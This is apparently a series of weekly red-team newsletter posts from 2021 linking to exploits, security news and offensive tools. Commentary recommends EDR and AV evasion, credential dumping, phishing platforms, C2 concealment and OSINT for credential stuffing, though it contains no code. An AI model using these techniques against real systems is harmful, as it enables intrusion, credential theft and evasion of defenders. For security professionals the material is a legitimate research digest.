• BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution. Yes, it's as crazy as it sounds. Be sure to check out the demo. These kinds of exploits (zero-click network subsystem exploits) always amaze me.
• Deanonymizing LinkedIn Users. This is a great OSINT article that shows how you can leverage LinkedIn to discover personal emails for individuals (useful in credential stuffing and phishing targeting). The API is limited to 1,000 requests every two days.
• Do You Really Know About LSA Protection (RunAsPPL)?. This article dives into the details of Protect Process Light, how it works, how it can be bypassed, and what the different PPL levels mean.
• HTML Maldoc Remote Macro Injection. Remote macros are useful to bypass mail scanning or other detection techniques that do not "detonate" the document. While it has been shown effective with .docx, this is an interesting use case with HTML documents.
• Detecting Exposed Cobalt Strike DNS Redirectors. You are (hopefully) using HTTPS redirectors, but what about DNS redirectors to mask your C2 server's fingerprints? dnsfwd (LWiS 2021-03-22) would do nicely.
• Attack Surface Reduction is a collection of research into Microsoft's Attack Surface Reduction rules. They are implemented in Lua, and the decompiled rules give lots of great information about easy things that instantly get marked "clean."
• Handling “Open File – Security Warning”. The SEE_MASK_NOZONECHECKS environment variable is a new one to me, and it prevents the security pop up seen on downloaded files ("mark of the web"). While this won't help with your initial payload (that I can think of), it could be useful for follow on actions.
• DInvoke to defeat EDRs. If aren't using Dinvoke with your C# you are missing out on all kinds of fun. This presentation walks through some of the existing research and packages it up nicely.

Tools and Exploits

• CVE-2021-24086 is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patched by Microsoft in February 2021. It is triggerable remotely by sending malicious UDP packet over IPv6. If you can reach an unpatched Windows machine with UDP over IPv6, you can bluescreen it. Put this one in the "demonstrate impact" folder and ensure your lawyer has reviewed whatever memo you got signed to allow its use on a customer.
• chrome "0day". It's really a 1day as the Chromium source has been patched but the patch hasn't been pushed to a release yet. It won't pop calc without the --no-sandbox flag, so bring your own sandbox escape!
• kiterunner is a "contextual content discovery tool" that uses traditional content discovery (throw a wordlist and look for non-error code responses), as well as more tailored requests with specific methods, headers, and parameters curated from multiple sources. More information at the assetnote blog.
• TiEtwAgent is a PoC memory injection detection agent based on ETW, for offensive and defensive research purposes. Use this in your lab to see if your fancy tools can defeat kernel-mode detection!
• dll-exports is a collection of DLL function export forwards for DLL export function proxying. This is great for stealthy Windows persistence.
• cook is a customizable wordlist and password generator. It allows you to define word parts and patterns and generates all combinations - and the readme has beautiful usage pictures!

This post is cross-posted on SIXGEN's blog.

News

• PoshC2 – Introducing Native macOS Implants. As more businesses adopt macOS, red teamers have started to build tooling to support engagements against them.
• NSA says it found new critical vulnerabilities in Microsoft Exchange Server. Like many big bugs, once one is exposed lots of researches take aim. Exchange is the latest target, falling at the recent Pwn2Own and now multiple vulnerabilities being reported by the NSA. How many more remain unreported?
• FBI Accesses Computers Around Country to Delete Microsoft Exchange Hacks. The warrant and its attachments authorize "the use of remote access techniques to search the electronic media" of the targeted Exchange servers. While it also states that it does not authorize any seizure or copying of content (besides the webshells themselves) and no alteration of functionality, the FBI still had access to your mail server. I suppose it's a good idea to patch to keep everyone out, not just the "bad guys."
• research-threats is a collection of legal threats against good faith Security Researchers; vulnerability disclosure gone wrong and is a continuation of work started by @attritionorg. Hopefully it will encourage companies to act better toward researchers trying to help them.
• Did Someone at the Commerce Dept. Find a SolarWinds Backdoor in Aug. 2020?. This is an interesting post that also brings up blue team OPSEC. While Virus Total and other similar services are great, what are you telling the world by uploading samples with accounts or information that tie back to your organization?
• Policy and Disclosure: 2021 Edition. Google Project Zero is often used as an example of how to do responsible disclosure, and they have taken that role seriously. In 2021 they are implementing a "90+30" model that give a 30 day grace period after a bug is fixed within 90 days to allow better patch adoption before technical details are released. As N-day authors get faster and faster, this grace period becomes more important.
• NAME:WRECK Breaking and fixing DNS implementations. Many IoT and industrial control OS's DNS implementations are bad. So bad, in fact, that you can get remote code execution with a specially crafted DNS response. This exploit requires an attacker to be able to respond to DNS requests - some form of man-in-the-middle.
• Codecov Bash Uploader Dev Tool Compromised in Supply Chain Hack. The year of the supply chain attack is well underway. This one targets a tool developers use to generate code coverage often used in CI. Who is affected? Lots of projects.

Techniques

• From 0 to RCE: Cockpit CMS. This post shows a few ways to exploit blind NoSQL injection, authenticated account takeover, and even remote code execution in the MongoLite library.
• Duo Two-factor Authentication Bypass. An issue where 2FA authentication state wasn't tied to a session allowed an attacker one the same Duo deployment to redirect 2FA prompts to their own device. This is a narrow use case, and Duo even did incident response and determined it had never been exploited - except by the researchers. A reminder that 2FA isn't always a dead end!
• Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086). The PoC has been out for two weeks (it was in LWiS) but this post shows how it was discovered and created. If you have an interest in patch diffing or N-day exploitation, read this post. Another post that leverages patch diffing was also released last week: CVE-2021-1647: Windows Defender mpengine remote code execution
• Basic operational security when dropping to disk. Despite all the in memory voodoo, if you want to persist in a network, you'll have to write something to disk at some point. This post includes some tips to blend in better. Pro tip: the limelighter.go from ScareCrow has the versioninfo and signing all in one (vs the official Limelighter).
• Named Pipe Pass-the-Hash. Ever have access to a Windows box, and want to run a command as a different low privileged user (whose NTLM hash you have) on the same machine, but that target user is not logged in or running any processes? This post describes the process of creating a tool to do just that. The tool: NamedPipePTH.
• Allow arbitrary URLs, expect arbitrary code execution. Lots of desktop apps are vulnerable to 1-click exploitation via URL handlers. These issues affect Windows and Linux, across lots of app types. Be careful what you click, and perhaps leverage these on your next phishing engagement.
• Airstrike Attack - FDE bypass and EoP on domain joined Windows workstations (CVE-2021-28316). Domain joined Windows machines would leak a MSCHAPv2 challenge response hash to a rogue access point which can be used to recover an NTLM hash and forge a Kerberos Silver ticket and gain full access to the locked computer's hard drive. This vulnerability was patched in the April 2021 security update for Windows.

Tools and Exploits

• Finding Metasploit & Cobalt Strike URLs. The great forensic tool creator DidierStevens has a new script to find likely metasploit or Cobalt Strike's 8bit checkums. Don't stage your payloads if you are worried about OPSEC. The tool is available here.
• SSD Advisory – OverlayFS PE. Ubuntu 14.04-20.10 were vulnerable to an issue with file capabilities (think setuid-bit, but slightly different) where an OverlayFS could set arbitrary capabilities on files in an outer namespace/mount. A full exploit is included.
• MineSweeper is a lightweight (17-18kb) binary for Windows user-land hook manipulation. This will be useful for EDR research.

• macOS Post-Exploitation

  • JXA_Proc_Tree is a JXA script for enumerating running processes, printed out in a json, parent-child tree. For use with a macOS JXA agent (i.e. Mythic).
  • Add-To-TCC-DB is a JXA script that leverages sqlite3 API calls to add items to the user's TCC (Transparency, Consent, and Control) database.
  • PrintTCCdb is a JXA script for Mythic that prints the TCC.db.
  • Persistent-Swift is a Swift port of some of the original PersistentJXA projects by D00MFist. Original PersistentJXA repo.

• Invoke-Stealth is a Simple & Powerful PowerShell Script Obfuscator. This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques. You can use any of them separately, together or all of them sequentially with ease, from Windows or Linux.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• pyMalleableC2 is a python interpreter for Cobalt Strike Malleable C2 Profiles. It allows you to parse, build and modify them programmatically. Unlike other simple parsers, this one actually uses an abstract syntax tree and should handle complex profiles much better.

This post is cross-posted on SIXGEN's blog.

News

• Ill-advised research on Linux kernel lands computer scientists in hot water. Researchers from the University of Minnesota purposely introduced bugs into the Linux Kernel as part of a study on the potential to introduce bugs into open source projects. I'm not sure why this was necessary as plenty of real bugs are already committed to open source projects, including the Linux kernel, that result in exploitable bugs. Linux maintainers responded, appropriately, by banning any contributions from a University of Minnesota email account. The researchers have issued an open letter to the Linux community, but the damage has been done.
• Security Incident Disclosure (Brew). Due to a way the Brew project's (package manager) GitHub actions were configured, it was possible to hide code from git_diff which would trick the auto-merge action into thinking only the version number was updated. This would allow an attacker to add malicious code to any Brew package without any human review. The issue has been fixed by disabling the automerge action as well as other steps including manual review.
• Computer security world in mourning over death of Dan Kaminsky, aged 42. A star in the infosec community, Dan most famously worked to fix multiple DNS implementations vulnerable to cache poisoning, gave multiple Blackhat and DEF CON talks, and was generally just a good person. His loss at a young age (due to diabetic ketoacidosis) is a reminder to step away from the keyboard and enjoy life.
• tmp.0ut Volume 1 is an homage to classic hacker zines packed full of great ELF knowledge.
• Google Chrome DNS Security Bypass. A Chrome "feature" called Async-DNS will perform DNS lookups to Google's DNS servers regardless of how the host is configured. This post also includes ways to disable this on Windows and macOS (add the --disable-async-dns flag to the command line), as it could prevent DNS based defenses or logging. If you rely on an internal DNS server, blocking UDP 53 outbound on your firewall is a temporary solution until Google starts using DNS-over-HTTPS for this "feature." Switching to Firefox is a permanent solution.
• REvil gang tries to extort Apple, threatens to sell stolen blueprints. Two interesting pieces of this story: The the stolen blueprints seem to confirm Apple's plans to add more ports and remove touch bar (all power users are happy about this), and the ransom is requested not it Bitcoin but in a much lesser known cryptocurrency called Monero which has true privacy.
• Project Jengo Redux: Cloudflare’s Prior Art Search Bounty Returns. Patent trolls are a symptom of a broken patent system, but Cloudflare's response to them is fantastic. A $100,000 bounty to invalidate the patents used by the trolls is a solution that can have positive outcome for Cloudflare and generate some publicity about this flaw in the patent system.
• clickstudios Passwordstate Incident Management Advisory #01. Supply chain attacks are here to stay, and what better software to hijack an update for than a password manager? Any critical systems should be protected by FIDO2 (U2F) hardware tokens. FIDO2 keys are a one-time investment that can save untold amounts of damage later on.
• Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective. Despite the questionable cryptocurrency moves, Signal proves it still has edge with this shade-ridden post about possibly, maybe, definitely including some Cellebrite parser 0days in a random selection of Signal user's devices. Interesting to see if this plays out in court with evidence rejected as it may have been tampered with or deleted by one of these exploits. Is it enough to cast doubt on any user's Signal data collected with Cellebrite?

Techniques

• Thread and Process State Change. A new Windows insider build added some APIs and syscalls to suspend and resume threads. This created new opportunities to sneakily handle some of the most monitored parts of process injection on Windows. Example code included at the end of the post.
• Anatomy of a simple and popular packer. Curious how popular packers are used to deliver "main stream" malware? This post tears apart Ficker Stealer and exposes the tricks it uses. Some of these techniques may be useful in your next adversary emulation engagement.
• Perun's Fart - yet another unhooking method. While many unhooking methods read a fresh copy of ntdll.dll from disk, this method simply starts a new process in a suspended state and copies ntdll.dll from that process which has no hooks as it has not started execution yet.
• AV Evasion Part 1. This post covers some basic AV evasion. If you are new to the game, this is a good place to start.
• NANDcromancy: Live Swapping NAND Flash. This is true hardware hacking sorcery. Replacing a NAND chip while a device is powered on is some next level hardware hacking.
• Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities. This post is a full start to finish walkthrough of a use-after-free bug in IE 8 on Windows 7 x86 from crash, to vulnerability identification, to shell. Careful Connor, any more complete and SANS will charge $7,500 a week for this.
• All Your Macs Are Belong To Us: bypassing macOS's file quarantine, gatekeeper, and notarization requirements. This now patched technique was found in the wild (0day) and managed to bypass all the protections put in place since 2015 to keep users from infecting themselves. Some times you have to test assumptions about security products to find a bypass. Just because something should never work, doesn't mean it won't.
• Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol. Potato exploits refuse to die, and in a special circumstance (you have a shell in session 0 and a Domain Admin has a shell in session 1) RemotePotato0 can escalate you to Domain Admin. Best/Worst of all, Microsoft labeled this a "won't fix."
• Azure Application Proxy C2. With Azure killing domain fronting, these types of "proxy C2" will become more popular.
• MS External Email Warning Bypass. When you put banners into user controlled HTML, you're going to have a bad time. Pro tip: look for the specific inserted HTML in a reply before you craft your defeat for your specific target.

Tools and Exploits

• CertStealer is a .NET tool for stealing and importing certificates in the Windows certificate store without touching disk. Useful for red team operations where you need to poach a certificate for pivoting purposes and want to do so with an in-memory post-ex payload.
• SharpNoPSExec is a fileless lateral movement tool that will query all services and randomly pick one with a start type disable or manual, the current status stopped and with LocalSystem privileges to reuse them. Once it select the service it will save its current state, replace the binary path with the payload of your choice and execute it. After waiting 5 seconds it will restore the service configuration.
• Meet EDD - He Helps Enumerate Domain Data. EDD is a .NET tool to enumerate Windows domain designed to be similar to the now unmaintained PowerView.
• PPLdump is a tool that implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) - in this blog post - for dumping the memory of any PPL as an administrator.
• AsIo3Unlock is a proof-of-concept bypass of pseudo-security caller check implemented in AsIO3, "unlocking" this driver for usage with FULL R/W access.
• fakemeeting is a tool for creating fake meeting invites. More details here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• STFUEDR. Everyone knows that userland hooks can be defeated, but some EDRs use drivers and kernel hooks. This project uses a driver signing bypass to defeat even those hooks!

This post is cross-posted on SIXGEN's blog.

News

• A call for feedback on our policies around exploits and malware. The Microsoft owned GitHub has taken down a few exploits in the past (all against Microsoft products I believe). While there are lots of hot takes on infosec twitter about how this is the end of hosting exploits on GitHub, from my reading GitHub is being about as reasonable as a Microsoft owned company can be at this stage. If we see projects being removed at a higher rate after this, perhaps those hot takes will be warranted. I find it somewhat ironic that git was built as a way to share code peer-to-peer (decentralized) and we as a community have turned to one centralized git host for nearly all our code.
• The IRS Wants Help Hacking Cryptocurrency Hardware Wallets. I find it interesting the IRS is looking for "repeatable, consistent" process to break hardware devices designed to store secrets and launches Operation Hidden Treasure, while there are maybe other issues to focus on.
• Why Google Should Stop Logging Contact-Tracing Data. After all the cryptographic work to ensure contract-tracing apps would preserve privacy, Google goes and dumps all the temporary identifiers into logs readable by phone manufacturers and other "privileged" apps. Who would have thought that a massive surveillance system on every smartphone would be potentially abused (surprised-pickachu.jpg).

Techniques

• I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map. Jean-Francois makes good points about developing your own tools, or at least understanding the tools/scripts you use in a Pentest. He has created an internal attack toolkit that can run C# binaries from the internet. This is useful for constrained environments like Citrix desktops or other machines with limited access to applications beyond MS Office, as you can run them from Macros.
• Discovering Null Byte Injection Vulnerability in GoAhead. This article goes to show that sometimes CTFs turn out real vulnerabilities!
• Overcoming Issues Using Custom Python Scripts with Burp Suite Professional. Burp Suite Professional is a great tool, and one of the best features is the ability to add your own features! Using the Python Scripter extension you are able to modify all requests, even from the active scanner, to get better results against custom web applications.
• Password reset code brute-force vulnerability in AWS Cognito. While there were limits on password reset tokens (6-digit numbers), the researchers in this post managed to use Turbo Intruder and simultaneous TCP connections to get a 0.32% chance of guessing a Cognito reset token. Not bad if you have a big list of users.
• Linux Kernel /proc/pid/syscall information disclosure vulnerability. While not super useful on its own, if you have a Linux bug that requires an information disclosure to defeat ASLR, this might be for you.
• Firebase Domain Front - Hiding C2 as App traffic. While Azure has killed classic domain fronting, these "function" based fronts will continue to work because the ability to run arbitrary code as a "function" is their core purpose.
• Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida. This very detailed post shows how Frida and x32dbg were used to get an RCE by modifying a Team Fortress 2 server to send malformed traffic.

Tools and Exploits

• DripLoader is an evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection, but does use direct syscalls. By using "standard" looking allocations and APIs, along with delays, DripLoader makes it difficult of EDRs to detect malicious activity during loading. It may be worth borrowing some of these techniques for your own custom loader.
• vaf is a "very advanced fuzzer" written in Nim. While not as featured as ffuf I enjoy seeing more Nim projects.
• SharpNamedPipePTH is a C# version of the tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. There is a blog post for explanation (from LWiS 2020-04-19).
• memory-module-loader is an implementation of a Windows loader that can load dynamic-link libraries (DLLs) directly from memory. The loader exposed by the Windows operating system can only load modules from disk via LoadLibrary or LoadLibraryEx. However, it is entirely possible to load libraries from memory instead. This is one such implementation. This loader supports loading resources as well.
• MicroBackdoor is a C2 tool for Windows targets with an easily customizable codebase and small footprint. Micro Backdoor consists of a server, client, and dropper. It wasn't designed as replacement for your favorite post-exploitation tools but rather as really minimalistic thing with all of the basic features in less than 5000 lines of code.
• DoUCMe leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting the usri1_priv of the USER_INFO_1 type to 0x1000. The primary goal is to avoid the normal detection of new user created events (4720). This will hide the user in the Control Panel and the lusrmgr.msc Snap In. It will show up in the Group Listing, but not as a user.
• interactsh is an open-source solution for out of band data extraction, A tool designed to detect bugs that cause external interaction (blind SQLi, blind CMDi, SSRF, etc). Interactsh is an alternative to Burp Collaborator with potential to tie into other tools (i.e. nuclei).

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• paragon is a red team engagement platform with the goal of unifying offensive tools behind a simple UI. This project looks really cool, and does a ton of the heavy lifting that everyone who has though, "I'll write my own implant/c2" has run into. I'm surprised this hasn't gotten more press (or maybe I've just missed it?).
• SniperPhish is a phishing platform that has a few more features than the favorite Gophish, like an advanced web page builder to customize credential harvesting. I have yet to find a phishing platform that allows for "inbox management" (i.e. replying to emails via the web interface).

This post is cross-posted on SIXGEN's blog.

News

• Media Statement Update: Colonial Pipeline System Disruption. The gasoline pipeline that runs up the east coast of the US is partially shut down and is operating on manual control after a DarkSide ransomware attack. After large media attention, the DarkSide crew released a statement that "our goal is to make money, and not creating problems for society." Perhaps choose a line of work that doesn't involve ransoming data?
• Consultation Paper on proposed amendments to the ICT Act for regulating the use and addressing the abuse and misuse of Social Media in Mauritius. The small Indian Ocean nation is proposing to "segregate... all incoming and outgoing internet traffic in Mauritius, social media traffic, which will then need to be decrypted, re-encrypted and archived for inspection purposes as and when required." Man-in-the-middle-ing a whole country is easier when there are only four fiber lines in and out, until Starlink arrives. This will require all citizen to install a new Certificate Authority - a process few understand and will normalize a dangerous process leaving the door open to malware and scammers.
• SA44784 - 2021-04: Out-of-Cycle Advisory: Multiple Vulnerabilities Resolved in Pulse Connect Secure 9.1R11.4. Nothing like a CVSS 10.0 remote unauthenticated code execution vulnerability in your VPN to wake you out of the normal vulnerability reviews. This one is already being exploited in the wild.
• 21Nails: Multiple vulnerabilities in Exim. Some serious issues discovered in the popular Exim mail server, including a chain that could allow for unauthenticated RCE as root. Exim has released an update, which CISA is pushing. PoC video here.
• Twitter Tip Jar reveals address of tipper. PayPal, like parent company eBay, is stuck in the early 2000's and coasting on market dominance. It's surprising no one at Twitter caught this before launch.
• Feral Terror vulnerability (some NETGEAR smart switches). Update those Netgear switches before the PoC drops on 2021-05-17!
• CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws. A driver shipped with most (all?) Dell Windows computers contained 5 flaws, 4 of which can be exploit for local elevation of privileges. PoC is being withheld until 2021-06-01 to allow patches to propigate.

Techniques

• A physical graffiti of LSASS: getting credentials from physical memory for fun and learning. With all the modern protections on memory access, what if you just used "physical" memory access to get secrets from LSASS? This post shows how the WinPmem driver can do just that. PoC code here.
• 'Phishing' Sites Buying Workplace Login Details Linked to Well-Funded Startup. Stop phishing with tricks and just buy access? Bold and seemingly effective.
• Malicious Office 365 Apps Are the Ultimate Insiders. In the age of the cloud, a 3rd-party "app" for your cloud is the ultimate persistence technique.
• Assembly.Lie – Using Transactional NTFS and API Hooking to Trick the CLR into Loading Your Code “From Disk”. Using some NTFS tricks, you can make your CLR assemblies appear to be loaded from "legitimate" looking paths on disk, like system32. For PoC code check out SharpTransactedLoad.
• Data Only Attack: Neutralizing EtwTi Provider. While this method requires a driver signing bypass (or Arbitrary Ring 0 R/W), as more EDR vendors move to the kernel this is the future of anti-detection engineering.
• Bypassing EDR real-time injection detection logic. This is the post that explains the reasoning behind last week's DripLoader release.

Tools and Exploits

• DoubleStar is a personalized/enhanced re-creation of the Darkhotel "Double Star" APT exploit chain with a focus on Windows 8.1 and mixed with some custom techniques. While this exploit chain makes use of two (now patched) 0day exploits, it also contains an elevation of privilege technique which is still as of 2021-05-10 not patched, and remains feasible for integration into future attack chains today.
• Introducing Mystikal. As more small and even large businesses adopt macOS, red teams are starting to focus more on the previously obscure platform. Mystikal is an initial access payload generator for macOS that includes: pkg installer with JavaScript, Microsoft Office Macros, and Armed "PDFs" (apps). Code here.
• keygrabber is a script for grabbing keys from a Linux host. Useful during red team exercises to quickly help assess what access to a Linux host can lead to.
• FalconEye is a windows endpoint detection software for real-time process injections. It is a kernel-mode driver that aims to catch process injections as they are happening (real-time). Since FalconEye runs in kernel mode, it provides a stronger and reliable defense against process injection techniques that try to evade various user-mode hooks. Add this to your detection lab and see if you can bypass it!
• DomainBorrowing is a Covenant implementation of the evolution of my talk on Domain Hiding (since crippled by Cloudflare). Using some smaller CDNs it's possible to "borrow" a wildcard certificates if you register a nonexistent subdomain with them. Like Domain Hiding, this technique likely has a short shelf life but is really great research!
• lateralus is a terminal based phishing campaign tool with template support. Could be useful for quick campaigns where you don't need the full power of something like Gophish.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• poseidon is a fully featured macOS Mythic implant with some Linux functionality as well.
• metacall/core allows calling functions, methods or procedures between multiple programming languages. The ability to glue together multiple languages into a single solution without much overhead is very cool.

This post is cross-posted on SIXGEN's blog.

News

• Humanity wastes about 500 years per day on CAPTCHAs. It’s time to end this madness. Cloudflare sets out to end CAPTCHAs and replace them with hardware tokens - which are increasingly built into modern computing devices.
• Exploiting custom protocol handlers for cross-browser tracking in Tor, Safari, Chrome and Firefox. "Scheme flooding" is a new technique that uses custom URL schemes to fingerprint your computer across browsers (even Tor browser). Check out the code and demo site.
• BloodHound Enterprise vs. BloodHound Open-Source. The upcoming Enterprise release of BloodHound shouldn't change anything for the open source version, and will provide lots of new features. What are the odds that a signed BloodHound Enterprise binary is allowed by major EDR vendors?
• Hashcat v6.2.0 Released. The latest hashcat adds 26 new hash modes, a new attack mode for single GPUs, new features and bug fixes.

Techniques

• Leveraging Microsoft Teams to persist and cover up Cobalt Strike traffic. In the age of remote work, your target is likely running Teams. This post shows how to leverage a DLL hijack for persistence when Teams runs as well as the creation of a C2 profile to mimic Teams traffic. Despite Microsoft saying domain fronting is dead, it hasn't been shut off on Azure quite yet, which allows your "Teams" traffic to front behind legitimate Microsoft domains.
• Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup. Posts like this are incredibly valuable for anyone looking to learn as they walk through the entire process from initial analysis to final PoC. Get the code here. Other PoCs are starting to pop up as well.
• Evil Logitech - erm I ment USB cable. Build your own hardware BadUSB cable with cheap parts and open source code.
• Dumping Plaintext RDP credentials from svchost.exe. In some (inconsistent) cases, the svchost.exe that has rdpcorets.dll loaded stores the user's RDP password in memory in plain text. This post shows you what to dump, and what to search for to possibly get credentials. It looks like this will soon be a feature in mimikatz.
• D-Link Router CVE-2021-27342 Timing Side-Channel Attack Vulnerability Writeup. By realizing that successful logins and incorrect logins varied wildly in the response time, credentials can be brute forced at high speed. Just because there is a delay for failure doesn't mean you can already try the next credential!
• Technical Analysis of Access Token Theft and Manipulation. This deck from McAfee's Advanced Threat Research group covers a lot of access token techniques.
• Hacking a company and accessing the back-end files leading to RCE and a 4-digit bounty. Note: original site down at the time of publishing. Inadvertent .git folders accessible lead to full compromise.

Tools and Exploits

• CVE-2020-28018 is one of the 21Nails Exim mail server vulnerabilities that combines a memory leak, arbitrary read primitive, and a write-what-where primitive to achieve arbitrary code execution. For details see From theory to practice: analysis and PoC development for CVE-2020-28018 (Use-After-Free in Exim).
• Solaris is a LKM rootkit loader/dropper that lists available security mechanisms.
• SharpNukeEventLog nukes the event log using some epic dinvoke fu to suspend the threads of the event log process.
• RedWarden is a Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation.
• Dent is a framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's Window's Defender Advanced Threat Protection (called Microsoft Defender for Endpoint this week) sensors. All the details are in Breaking the (WDAPT) Rules with COM.
• Russian is a registry file that changes two keys that are checked by some malware to determine if you are using a Russian language keyboard. This should be an absolute last resort defense against ransomware, but is very easy to deploy.
• exclave helps offload wrapping/unwrapping of offensive payloads with Intel SGX technology assist. This is an interesting project to protect C2 secrets using protected processor memory and Intel's secure enclave technology.
• dnMerge is a lightweight .NET assembly dependency merger that uses dnLib and 7zip's LZMA SDK for compressing dependant assemblies.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• delta aims to make time studying diffs both efficient and enjoyable: it allows you to make extensive changes to the layout and styling of diffs, as well as allowing you to stay arbitrarily close to the default git/diff output.
• jenkins-attack-framework is a project to help assess the popular CI/CD product Jenkins.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

This post is cross-posted on SIXGEN's blog.

News

• How to prevent crypto mining abuse on GitLab.com SaaS. Cryptocurrency miners have ruined GitLab CI for the rest of us. Now even free accounts will require a credit card check, killing anonymous accounts that want to use CI/CD.
• Cheese photo leads to Liverpool drug dealer's downfall. A photo of a hand holding a block of cheese was all it took to match palm and fingerprints and identify the suspect. Is this a real life case of "Enhance?"
• Threema gewinnt vor Bundesgericht «gegen Überwachungsbehörden». The secure messaging app Threema does not have to provide any data to authorities, rules Swiss federal court, in a win for privacy in Europe.

Techniques

• Operators, EDR Sensors, and OODA Loops. This is a long post (full con talk), but should be required reading for any serious red team operator. Lots of people (ahem, me) can get focused on the latest exploit or technique and lose sight of process of red teaming. Hopefully this blog can serve as part of the "continual learning and growth" part of the act phase.
• What the F#*%. The lesser known cousin of C# comes with Microsoft signed binaries that can be useful to get past application allowlisting defenses. Code available in the What-The-F repository.
• That single GraphQL issue that you keep missing. Bug hunters will love this post on GraphQL based CSRF. The latest release of inql will help identify such issues on your next assessment or bug hunt.
• CVE-2021-31166: A Wormable Code Execution Bug in HTTP.sys. While not as bad as it sounds, this is reachable from IIS and WinRM, so do patch! BSOD PoC: CVE-2021-31166.
• CloudFlare for IP Address Filtering. CloudFlare is a massive presence on the internet today, hosting over 25 million domains. In this post Vincent uses the CloudFlare firewall to block known security organizations as well as "bots" to defend his red team infrastructure.
• Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack. This tool/technique helps an attacker create an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting consent to the application so that the attacker can gain access to the data that the target user has access to. After the application has been granted consent, it has user account-level access to the data without the need for an organizational account. This can be defeated by admins who enable tenant restrictions to manage access to SaaS cloud applications.
• Unveiling DNSStager: A tool to hide your payload in DNS. With enough delay, the 59 AAAA DNS requests could easily be lost on the noise and provide the perfect way to load a lifeline beacon. They client could be modified to check a trigger (value in a GitHub gist, Twitter bio, etc) and start the process when the value changes. Be careful though DNS is one of those things that defenders are either totally blind to, or can get you caught easily if someone is watching (high entropy/high volume of unusual requests).
• Modding Gophish. Gophish has some default and unchangeable features that you may not want (X-Mailer header perhaps). This post shows how to change the 404 page as well as how to enable basic HTTP auth which may be more trusted by your targets.
• Le Zeek, C’est Chic: Using an NSM for Offense. The blue team's favorite tool can also be used for offense to find dual-homed machines, dns queries, and even plaintext credentials on the wire.
• SimuLand: Understand adversary tradecraft and improve detection strategies. SimuLand is an open-source initiative by Microsoft to help security researchers around the world deploy lab environments that reproduce well-known techniques used in real attack scenarios, actively test and verify the effectiveness of related Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections, and extend threat research using telemetry and forensic artifacts generated after each simulation exercise.
• How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks. This excellent post discusses two methods by which an attacker can meet the requirements of hosting an “Intranet” site, explains how an attacker can combine this scenario with Active Directory ACL attack path vulnerabilities and LDAP relaying attacks to elevate privileges, and provides a detailed walkthrough of how an operator can accomplish these tasks through Cobalt Strike.

Tools and Exploits

• HelpColor. I open the Beacon Command Behavior Survey page all the time; this will be super useful for quickly seeing if I am about to fork and run! It's easy to add your own BOFs and other tools as well.
• RDPThiefInject is RdpThief run through donut and wrapped in C# to easily inject into mstsc. Convert to D/Invoke before using for better OPSEC.
• OffensivePH. The older ProcessHacker driver has a lot of capabilities and may be a "known good" and thus not be detected.
• golang-insecureskipverify-patch. If you need to inspect TLS protected communication of a black-box golang binary and it does not trust the system level CA certificates, then you can use this tool to patch the executable to act like InsecureSkipVerify was turned on. You still have some additional work, configuring a transparent proxy and setting up mitmproxy or similar.
• macos_shell_memory is a CGo implementation of the initial technique put forward by Stephanie Archibald in her blog, Running Executables on macOS From Memory. It includes some convenience patches like prevent the executable's exit() call from killing the Go process.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

• link is a command and control framework written in rust (cross platform) that has execute-assembly and other advanced featuers.
• metarget is a framework providing automatic constructions of vulnerable infrastructures.
• BlueCloud is a project for cyber range deployment including Velociraptor + HELK system with a Windows VM for security testing and R&D with Azure and AWS terraform support.
• in-memory-cpython is a mod of cpython that can be run entirely from memory for use in offensive or defensive tooling.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

News

• VMSA-2021-0010: What You Need to Know. "There is a remote code execution vulnerability in the vSAN plugin, which ships as part of vCenter Server. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of whether you use vSAN or not." No PoC yet, but considering vCenter/ESXi usually host most critical IT assets, this should be an emergency patch. Get the NSE checker here, and more analysis here.
• QUIC Version 1 is live on Cloudflare. QUIC is a new transport protocol built on top of UDP. Unfortunately, to access HTTP resources with HTTP/3, QUIC still includes an unencrypted Client Hello which includes the server name. Can you combine Encrypted Client Hello and QUIC (add ECH support to the test client and let me know)? QUIC also has some interesting things in the pipeline (masque).
• Introducing Half-Double: New hammering technique for DRAM Rowhammer bug. Attackers can now use a second controlled row, which has a "non-liner gating effect" to "transport" the Rowhammer effect from the first to the row, through the second, to a victim row and is an intrinsic property of the underlying silicon substrate. No practical implications yet, but now you know when the CISO asks if you need to remediate for the new row hammer variant. JEDEC has published two documents about DRAM and system-level mitigation techniques (JEP300-1 and JEP301-1).
